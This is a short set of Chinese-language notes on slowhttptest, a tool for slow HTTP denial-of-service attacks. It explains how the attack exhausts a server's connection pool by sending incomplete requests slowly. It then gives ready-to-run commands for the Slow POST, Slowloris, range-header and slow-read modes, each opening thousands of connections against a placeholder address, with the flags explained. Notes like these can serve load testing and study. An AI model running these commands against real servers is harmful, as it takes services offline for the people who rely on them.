1. Slowhttptest
1.1. HTTP应用层拒绝服务攻击工具
- 利用低带宽慢速拒绝服务(HTTP SYN)
- 针对apache,、tomcat(最新版已修复此漏洞)
- ulimite -n 70000
- 支持代理
2. 原理
- 大量消耗目标并发连接池
- 缓慢发送不完整的HTTP请求,服务器等待并保持连接
3. 方式
- SlowPOST:content-length声明长度,但body部分缓慢发送
slowhttptest -c 8000 -B -g -o body_status -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3
# -c ---------------- 连接数
# -B ---------------- slow Body 方式
# -g -o ------------- 生成结果
# -i ---------------- 发送数据的时间间隔
# -r ---------------- 每秒钟建立多少个连接
# -s ---------------- 发送多少个字节
# -t ---------------- 请求方式(可以GET,POST也可以随意伪造一个)
# -u ---------------- 目标服务器地址
# -x ---------------- 一次最大发多少个字节
# -p ---------------- 超时
- Slowloris:http请求头只发一个\r\n(正常是两个)
slowhttptest -c 8000 -H -g -o header_status -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3
# -H ----- Slowloris方式
slowhttptest -R -u http://1.1.1.1 -t HEAD -c 8000 -a 10 -b 3000 -r 500
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://1.1.1.1/index.html -p 3
